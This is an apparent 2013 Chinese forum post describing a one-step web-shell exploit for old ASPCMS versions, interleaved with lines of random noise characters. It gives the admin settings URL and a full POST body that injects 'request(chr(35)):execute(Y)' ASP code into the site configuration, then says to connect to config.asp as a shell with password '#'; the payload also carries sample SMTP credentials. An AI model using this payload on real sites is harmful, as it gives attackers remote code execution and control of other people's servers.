老的ASPCMS版本的秒杀拿SHELL漏洞
& K# ?/ x" n# U; m$ B* T5 N4 {/ o! v3 j. j+ V$ C- I
找到后台。。。然后& U- w5 J) `, R) ~2 E6 z8 q
+ _4 ?/ F- n7 x+ |! m* u- G/admin/_system/AspCms_SiteSetting.asp?action=saves
3 m& U# o, e4 Y9 {" {3 }8 ` 6 \# T' y- J6 J3 r* S
直接POST
: g5 `/ b" ^1 Y" o! H2 X . A9 r1 w8 O# _. A. d# k& M& U5 c
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
8 u; } u. G6 r9 f% v; O
; h$ t+ S H) _2 R6 Z% m再连接配置文件config.asp 密码为#
$ J# {. A8 g9 K+ c" ?1 R |
发表于 2013-2-4 16:18:35
收藏
支持
反对